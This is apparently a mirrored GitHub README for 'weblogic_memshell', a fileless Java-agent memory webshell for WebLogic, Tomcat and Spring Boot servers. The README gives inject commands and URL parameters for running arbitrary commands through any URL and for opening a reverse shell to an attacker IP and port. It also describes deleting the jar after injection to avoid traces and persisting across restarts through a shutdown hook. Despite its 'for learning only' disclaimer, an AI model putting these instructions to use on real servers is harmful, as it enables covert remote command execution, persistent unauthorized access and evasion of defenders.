Giter Site home page Giter Site logo

weblogic_memshell's Introduction

说明

一个基于javaagent+ASM的无文件落地的javaagent,兼容多种容器(weblogic,Tomcat,Springboot).

inject jdk要求

  • Java 8

agent jdk要求

  • Java 6-11

兼容版本

  • weblogic 10.3.6
  • weblogic 12.2.1.2
  • weblogic 12.2.1.3
  • weblogic 12.1.3.0
  • Tomcat 8.5.61
  • Spring boot

测试平台

  • macos 10.0+
  • centos 7.1
  • windows 10
  • windows 11

使用说明

inject 参数

java -jar inject.jar [your_password]  # 通用运行
java -jar inject.jar -p               # 打印所有运行的java进程名
java -jar inject.jar [your_password] [process_name] # 定向注入到[process_name]

请求参数

任意url?psw =[your_password]&cmd=[your_cmd]  执行任意命令
任意url?psw =[your_password]&ip=[attack_ip]&port=[attack_port] 反弹shell

测试案例

运行java -jar inject-1.0.jar x1001 java 在服务器端可以看到以下,说明注入成功,并删除当前jar包,达到无shell状态: server 访问任意url,带上参数psw=your_password&cmd=your_cmd request 当应用关闭时。攻击jar包自动生成到java虚拟机目录下。 persist 下次启动,自动注入达到持久化的效果。 persist2

经测试,通过kill -9或者强制结束进程杀死容器进程,并不会触发addShutdownHook,也就不会持久化。 网上查询以下几种杀死进程的情况:

  • 所有的线程已经执行完毕(√)
  • 调用System.exit()(√)
  • 用户输入Ctrl+C(√)
  • 遇到问题异常退出(√)
  • kill -9 杀掉进程(×)

更新

2021/06/19

  • 修改hook点为javax/servlet/FilterChain,使其同时兼容tomcat.
  • weblogic注入内存马,现在访问任意url,带上密码和命令即可

2021/12/02

  • 简化hook流程
  • 去除大部分打印
  • inject.jar增加自定义hook的进程
  • 增加反弹shell

参考

https://github.com/rebeyond/memShell

声明

本项目仅供学习使用,勿做它用

weblogic_memshell's People

Contributors

keven1z avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar

Forkers

dycsy changheluor007 xiaopihaik crackercat syl3r gysf666 functfan fankaren atlassion jeromeyoung jager-man jimsonzhang z0edff0x3d smallbluefox klinklinklin msr00t ne0ke718 minejzy abcsd478 gamblingmaster2020 wayswei test1213145 icysun ddostest123 madaharce

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.